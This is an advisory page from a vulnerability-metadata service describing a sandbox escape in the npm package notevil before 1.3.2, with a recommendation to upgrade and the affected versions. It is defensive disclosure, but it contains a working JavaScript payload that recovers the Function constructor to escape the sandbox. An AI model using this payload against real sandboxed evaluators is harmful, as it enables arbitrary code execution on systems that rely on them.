Ecosyste.ms: Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTdyNWYtN3FyNC1wZjZx

Sandbox Breakout / Arbitrary Code Execution in notevil

Versions of notevil prior to 1.3.2 are vulnerable to a sandbox escape leading to arbitrary code execution. The package fails to prevent access to the `Function` constructor because it does not check the return values of function calls made inside the sandbox. This allows an attacker to reach the `Function` prototype's constructor and escape the sandbox. An example payload is:

```javascript
var safeEval = require('notevil')
var input = "" +
"function fn() {};" +
"var constructorProperty = Object.getOwnPropertyDescriptors(fn.__proto__).constructor;" +
"var properties = Object.values(constructorProperty);" +
"properties.pop();" +
"properties.pop();" +
"properties.pop();" +
"var Function = properties.pop();" +
"(Function('return this'))()";
safeEval(input)
```


## Recommendation

Upgrade to version 1.3.2 or later.

Permalink: https://github.com/advisories/GHSA-7r5f-7qr4-pf6q
JSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTdyNWYtN3FyNC1wZjZx
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: over 3 years ago
Updated: over 1 year ago


Identifiers: GHSA-7r5f-7qr4-pf6q
References:
Blast Radius: 0.0

Affected Packages

npm:notevil
Dependent packages: 32
Dependent repositories: 1,049
Downloads: 18,038 last month
Affected Version Ranges: < 1.3.2
Fixed in: 1.3.2
All affected versions: 0.0.0, 0.0.1, 0.0.2, 0.1.0, 0.2.0, 0.3.0, 0.4.0, 0.5.0, 0.6.0, 0.7.0, 0.8.0, 0.8.1, 1.0.0, 1.1.0, 1.2.0, 1.3.0, 1.3.1
All unaffected versions: 1.3.2, 1.3.3